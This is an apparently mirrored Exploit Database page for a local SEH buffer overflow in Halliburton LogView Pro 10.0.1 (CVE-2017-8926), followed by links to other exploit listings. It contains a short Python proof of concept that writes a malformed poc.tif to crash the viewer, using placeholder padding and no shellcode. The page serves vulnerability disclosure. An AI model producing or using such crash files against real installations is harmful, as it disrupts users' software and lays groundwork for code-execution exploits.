Halliburton LogView Pro 10.0.1 – Local Buffer Overflow (SEH)

Exploit Database
37 阅读

作者： Muhann4d

日期： 2017-05-14
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/42001/

#!/usr/bin/python
# Exploit Title : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)
# Date: 2017-05-14
# Exploit Author: Muhann4d
# CVE : CVE-2017-8926
# Vendor Homepage : http://www.halliburton.com
# Software Link : http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe
# Affected Versions : 10.0.1 
# Category: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional SP1 32bit
# Proof of Concept: run the exploit, open the poc.tif file with the Halliburton LogView Pro 10.0.1

# Vendor has been cantacted but no reply.

buf = "\x41" * 848
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()

last Exploits
Halliburton LogView Pro 10.0.1 – Local Buffer Overflow (SEH)的更多信息

Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 – Out-of-Bounds Read Denial of Service：
Microsoft Edge Chakra JIT – Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions：
Hanso Converter 1.4.0 – ‘.ogg’ Denial of Service：
Oracle VM VirtualBox 4.0 – ‘tracepath’ Local Denial of Service：
Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 – Denial of Service：
Palo Alto Networks PanOS – appweb3 Stack Buffer Overflow：
Microsoft Windows Kernel – WindowStation Use-After-Free (MS15-061)：
Catia V5-6R2013 – ‘CATV5_Backbone_Bus’ Stack Buffer Overflow (PoC)：